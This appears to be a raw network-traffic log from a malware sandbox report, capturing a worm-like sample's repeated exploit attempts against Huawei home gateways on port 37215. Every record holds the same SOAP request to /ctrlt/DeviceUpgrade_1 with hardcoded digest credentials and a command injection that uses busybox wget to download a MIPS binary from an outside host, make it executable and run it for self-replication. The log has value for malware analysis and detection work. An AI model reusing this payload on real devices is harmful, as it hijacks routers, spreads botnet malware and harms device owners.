                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1938192.168.2.2351130157.26.239.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.562525034 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1939192.168.2.2357106103.96.144.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.562567949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1940192.168.2.2349906197.52.95.22737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.562968969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1941192.168.2.2352042157.135.253.3837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.562968969 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1942192.168.2.2360764102.174.123.12037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.562977076 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1943192.168.2.234871841.171.106.16137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.563035011 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1944192.168.2.234144441.120.27.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588606119 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1945192.168.2.2350290157.123.147.637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588628054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1946192.168.2.2348018188.38.169.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588649035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1947192.168.2.235019642.41.12.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.588696957 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
